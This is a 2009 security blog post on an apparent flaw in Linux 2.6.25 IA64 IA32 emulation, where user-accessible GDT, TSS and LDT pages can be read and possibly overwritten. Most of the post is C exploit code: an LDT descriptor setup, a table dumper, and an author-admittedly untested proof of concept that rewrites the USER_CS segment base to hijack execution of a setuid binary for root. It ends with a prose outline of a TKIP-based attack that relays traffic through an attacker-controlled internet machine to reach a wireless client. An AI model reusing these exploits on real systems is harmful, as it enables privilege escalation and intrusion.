(added 11/10/2009)
This posting is to clear a backlog of things I've been meaning to post at some stage. They're mostly unfinished due to a lack of motivation, but here goes:
(started around 23/5/2008)
While doing some random research recently, I was browsing the Linux 2.6.25.2 kernel source in arch/ia64/ia32/. While reading through binfmt_elf32.c, I stumbled across an interesting comment in the function ia64_elf32_init():
/*
 * Map GDT below 4GB, where the processor can find it. We need to map
 * it with privilege level 3 because the IVE uses non-privileged accesses to these
 * tables. IA-32 segmentation is used to protect against IA-32 accesses to them.
 */
I thought it was particularly interesting that they mention segmentation being used to protect the applicable data against access and modification.
Please keep in mind that I don't have an IA64 box to test this on, so it's currently speculation based on what information I can gather. If you do have an IA64 with IA32 Linux emulation, feel free to test and report back to me; I'd be interested in finding out :)
The code seems to lay memory out with a 3GB address space, with a couple of pages above the 3GB mark for the GDT, LDT, and TSS.
From the ia32priv.h file, we have:
#define IA32_STACK_TOP IA32_PAGE_OFFSET
#define IA32_GATE_OFFSET IA32_PAGE_OFFSET
#define IA32_GATE_END IA32_PAGE_OFFSET + PAGE_SIZE

/*
 * The system segments (GDT, TSS, LDT) have to be mapped below 4GB so the
 * IA-32 engine can access them.
 */
#define IA32_GDT_OFFSET (IA32_PAGE_OFFSET + PAGE_SIZE)
#define IA32_TSS_OFFSET (IA32_PAGE_OFFSET + 2*PAGE_SIZE)
#define IA32_LDT_OFFSET (IA32_PAGE_OFFSET + 3*PAGE_SIZE)
where IA32_PAGE_OFFSET is #define'd to 0xc0000000 in include/asm-ia64/ia32.h.
There appear to be several ways we can access the data. The easiest is probably via the standard system calls that take a pointer and use it in some way, such as read() or write(). Additionally, we can directly modify the data by creating a new descriptor with its limit set to 4GB (which can be done via the modify_ldt() syscall).
Using the read() / write() mechanism is probably the best and most flexible way to manipulate the data.
Creating a new descriptor is easy enough; the code below shows how:
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/syscall.h>
#include <asm/ldt.h>
#include <stdio.h>

#define TYPE user_desc // modify_ldt_ldt_s for 2.4

// Install LDT entry `num`. Returns 1 on success, 0 on failure.
int do_ldt(int num, unsigned long base, int type)
{
    struct TYPE ldt_entry = {
        num,                        // entry_number
        (unsigned long int) (base), // base_address
        0xfffff,                    // limit, 4G
        1,                          // seg_32bit
        type,                       // contents
        0,                          // read_exec_only
        1,                          // limit_in_pages
        0,                          // seg_not_present
        1                           // usable
    };

    // glibc declares no modify_ldt() wrapper, so go through syscall().
    // func 1 = write an LDT entry.
    return syscall(SYS_modify_ldt, 1, &ldt_entry, sizeof(struct TYPE)) == 0;
}

int main(int argc, char **argv)
{
    if(do_ldt(0, 0, MODIFY_LDT_CONTENTS_DATA) == 0) {
        printf("Failed to modify the ldt\n");
        exit(EXIT_FAILURE);
    }

    // the new segment will be accessible via 0x07, (0 * 8) | user priv | ldt etc.
    __asm__ volatile("pushw $7;\
        popw %ds;");

    printf("We've changed our ds segment descriptor\n");
    return 0;
}
If the above code is being compiled on a 2.4 kernel, struct user_desc will need to be changed to struct modify_ldt_ldt_s, which can be done by changing the TYPE define above. This should allow direct access according to the comment above. Make sure it's compiled in 32-bit mode, and that the appropriate emulation options/modules are active.
The write_ldt() function in ia32_ldt.c in 2.6.25.2 doesn't do any checking of what memory becomes accessible through the new descriptor.
I'd like to repeat that I don't have access to an IA64 box to test this out, but I'm going to attempt to write a couple of proof of concept exploits. Let me know if it works :)
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <fcntl.h>
#include <errno.h>
#include <stdio.h>

#define PAGE_SIZE 4096
#define IA32_PAGE_OFFSET 0xc0000000
//#define IA32_PAGE_OFFSET (x == 0 ? x = malloc(4 * 4096) : x)
#define IA32_STACK_TOP IA32_PAGE_OFFSET
#define IA32_GATE_OFFSET IA32_PAGE_OFFSET
#define IA32_GATE_END (IA32_PAGE_OFFSET + PAGE_SIZE)
#define IA32_GDT_OFFSET (IA32_PAGE_OFFSET + PAGE_SIZE)
#define IA32_TSS_OFFSET (IA32_PAGE_OFFSET + 2*PAGE_SIZE)
#define IA32_LDT_OFFSET (IA32_PAGE_OFFSET + 3*PAGE_SIZE)

unsigned char *x;

int main(int argc, char **argv)
{
    int fd;

    // write() copies from our address space into the file, so handing it
    // the table's address dumps that page (if the kernel lets us read it).
    fd = open("gdt.bin", O_WRONLY|O_TRUNC|O_CREAT, 0600);
    if(fd == -1) {
        printf("Failed to open gdt.bin: %m\n");
        exit(EXIT_FAILURE);
    }
    if(write(fd, (void *) IA32_GDT_OFFSET, 4096) != 4096) {
        printf("Failed to write() 4096 bytes\n");
        exit(EXIT_FAILURE);
    }
    close(fd);
    printf("Dumped GDT\n");

    fd = open("tss.bin", O_WRONLY|O_TRUNC|O_CREAT, 0600);
    if(fd == -1) {
        printf("Failed to open tss.bin: %m\n");
        exit(EXIT_FAILURE);
    }
    if(write(fd, (void *) IA32_TSS_OFFSET, 4096) != 4096) {
        printf("Failed to write() 4096 bytes\n");
        exit(EXIT_FAILURE);
    }
    close(fd);
    printf("Dumped TSS\n");

    fd = open("ldt.bin", O_WRONLY|O_TRUNC|O_CREAT, 0600);
    if(fd == -1) {
        printf("Failed to open ldt.bin: %m\n");
        exit(EXIT_FAILURE);
    }
    if(write(fd, (void *) IA32_LDT_OFFSET, 4096) != 4096) {
        printf("Failed to write() 4096 bytes\n");
        exit(EXIT_FAILURE);
    }
    close(fd);
    printf("Dumped LDT\n");
    return 0;
}
After thinking about it a little, there may be little point in getting ring0 itself, but I haven't completely read through the Itanium manuals.
According to the docs I've read so far, I/O ports need to be explicitly mapped in and enabled by the operating system. Other "privileged" instructions generate traps.
If ring0 would be useful in some capacity, it could be gained by setting up appropriate LDT entries if needed, then overwriting the CS register saved in the TSS and modifying its privilege level.
However, there would be a way to gain additional privileges if a setuid root x86 binary is installed on the system. This would be done by manipulating the segment base address in the GDT so that, upon execve() of a suid process, the entry point ends up pointing at custom code (probably on the stack) because of the segment base. From what I've read of the Itanium manual, segmentation is used to calculate the real address being accessed (à la x86).
Setting the GDT base would probably also have the side effect of crashing any existing IA32 processes.
Theory:
1. Calculate where the initial entry point is going to be
2. Calculate where our stack arguments are going to be (or a suitable .text / library code location)
3. Modify the GDT base value for USER_CS
4. Execute a setuid x86 binary.
Randomisation probably won't be an issue due to the personality() syscall :)
The initial entry point will be the entry point in the binary if it's not dynamically linked; if it is dynamically linked, the loader's entry point will be the initial entry point.
Here's some sample code I came up with; I don't know if it works or not since I don't have access to the architecture to test. Don't forget to compile in 32-bit mode (-m32 may suffice). If your compiler doesn't generate suitable binaries, compile on an x86 box.
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <fcntl.h>
#include <errno.h>
#include <stdio.h>
#define PAGE_SIZE 4096
#define IA32_PAGE_OFFSET 0xc0000000
//#define IA32_PAGE_OFFSET (x == 0 ? x = malloc(4 * 4096) : x)
#define IA32_STACK_TOP IA32_PAGE_OFFSET
#define IA32_GATE_OFFSET IA32_PAGE_OFFSET
#define IA32_GATE_END IA32_PAGE_OFFSET + PAGE_SIZE
#define IA32_GDT_OFFSET (IA32_PAGE_OFFSET + PAGE_SIZE)
#define IA32_TSS_OFFSET (IA32_PAGE_OFFSET + 2*PAGE_SIZE)
#define IA32_LDT_OFFSET (IA32_PAGE_OFFSET + 3*PAGE_SIZE)
#define __USER_CS 0x23
#define __USER_DS 0x2B
unsigned char *x;
/* borrowed from arch/ia64/ia32/ia32priv.h */
#define IA32_PAGE_SHIFT 12 /* 4KB pages */
#define __USER_CS 0x23
#define __USER_DS 0x2B
#define IA32_SEG_BASE 16
#define IA32_SEG_TYPE 40
#define IA32_SEG_SYS 44
#define IA32_SEG_DPL 45
#define IA32_SEG_P 47
#define IA32_SEG_HIGH_LIMIT 48
#define IA32_SEG_AVL 52
#define IA32_SEG_DB 54
#define IA32_SEG_G 55
#define IA32_SEG_HIGH_BASE 56
#define IA32_SEG_DESCRIPTOR(base, limit, segtype, nonsysseg, dpl, segpresent, avl, segdb, gran) \
(((limit) & 0xffff) \
| (((unsigned long) (base) & 0xffffff) << IA32_SEG_BASE) \
| ((unsigned long) (segtype) << IA32_SEG_TYPE) \
| ((unsigned long) (nonsysseg) << IA32_SEG_SYS) \
| ((unsigned long) (dpl) << IA32_SEG_DPL) \
| ((unsigned long) (segpresent) << IA32_SEG_P) \
| ((((unsigned long) (limit) >> 16) & 0xf) << IA32_SEG_HIGH_LIMIT) \
| ((unsigned long) (avl) << IA32_SEG_AVL) \
| ((unsigned long) (segdb) << IA32_SEG_DB) \
| ((unsigned long) (gran) << IA32_SEG_G) \
| ((((unsigned long) (base) >> 24) & 0xff) << IA32_SEG_HIGH_BASE))
/* </borrowed> */
int main(int argc, char **argv)
{
    int fd;
    unsigned char scratch[4096];
    unsigned long long *gdt = (unsigned long long *)(scratch);
    unsigned long long entry_point;

    if(argc != 2) {
        printf("%s <gdt offset>\n", argv[0] ? argv[0] : ";PpP");
        printf("--> 0xbfffe000 (or wherever your r00tc0de is- <libc entry point> = offset, i think ;p\n");
        printf("--> offset probably needs to be aligned so it can be shifted\n");
        printf("--> in hex\n");
        exit(EXIT_FAILURE);
    }

    entry_point = strtoul(argv[1], 0, 16);

    fd = open("gdt.bin", O_RDWR|O_TRUNC|O_CREAT, 0600);
    unlink("gdt.bin");
    if(fd == -1) {
        printf("Failed to open gdt.bin: %m\n");
        exit(EXIT_FAILURE);
    }

    if(write(fd, IA32_GDT_OFFSET, 4096) != 4096) {
        printf("Failed to write() 4096 bytes\n");
        exit(EXIT_FAILURE);
    }
    printf("--> Dumped GDT\n");

    if(lseek(fd, 0, SEEK_SET) == (off_t)(-1)) {
        printf("Unable to seek to start of fd\n");
        exit(EXIT_FAILURE);
    }
    if(read(fd, scratch, 4096) != 4096) {
        printf("Unable to read 4096 bytes from our fd\n");
        exit(EXIT_FAILURE);
    }
    if(lseek(fd, 0, SEEK_SET) == (off_t)(-1)) {
        printf("Unable to seek to start of fd\n");
        exit(EXIT_FAILURE);
    }

    // borrowed from ia32_support.c :P, but modified
    gdt[__USER_CS >> 3] = IA32_SEG_DESCRIPTOR(entry_point, (IA32_GATE_END-1) >> IA32_PAGE_SHIFT,
        0xb, 1, 3, 1, 1, 1, 1);

    if(write(fd, scratch, 4096) != 4096) {
        printf("Unable to write modified data back\n");
        exit(EXIT_FAILURE);
    }
    if(lseek(fd, 0, SEEK_SET) == (off_t)(-1)) {
        printf("Unable to seek backwards\n");
        exit(EXIT_FAILURE);
    }

    printf("--> If things go well, then this should crash once read() returns to userspace. If not, hmm! maybe we moved to another processor afterwards or so?\n");
    if(read(fd, IA32_GDT_OFFSET, 4096) != 4096) {
        printf("Failed to read() 4096 bytes :(\n");
        exit(EXIT_FAILURE);
    }

    printf("Hrm. It worked. but it hasn't crashed. Maybe re-run a couple of times? Maybe I've missed something?\n");
    close(fd);
}
At any rate, spender tested the code up to dumping the GDT, which goes to show it can be accessed, and presumably modified (I suspect you could mprotect() it if it is made read-only at some stage).
Beyond that, I haven't been able to test anything myself due to lack of access to hardware :p
(started 14/12/2008)
When the TKIP flaw came to light (which allowed you to send a couple of packets to a client station), I played around with the idea of using an attacker-controlled machine on the internet to help "conspire" against the client station.
By using the UIP TCP/IP stack, I wrote a program to help attack the client by the following means:
Wireless attacker -> Does TKIP attack, can send some packets to client machine
Wireless attacker -> Sends SYN packets to client machine on "common"
vulnerable ports (139/445/80/23/etc), with source IP of
an internet machine we control
Internet Machine -> Looks for SYN|ACK packets, if found, sets up a suitable
UIP connection structure, and fixes up the seq/ack
numbers. Machine then creates a local socket, and buffers
the data between local socket, and UIP connection to the
attacked machine.
Wireless attacker -> Can then attack the client machine with a bunch of
standard exploits
This type of attack is highly dependent on the network infrastructure in use. Outgoing SYN|ACKs may not be NAT'd properly in NAT environments (because no incoming SYN was seen), firewalls may not allow outgoing connections, and as an additional complication the attacked client may have a firewall enabled, etc.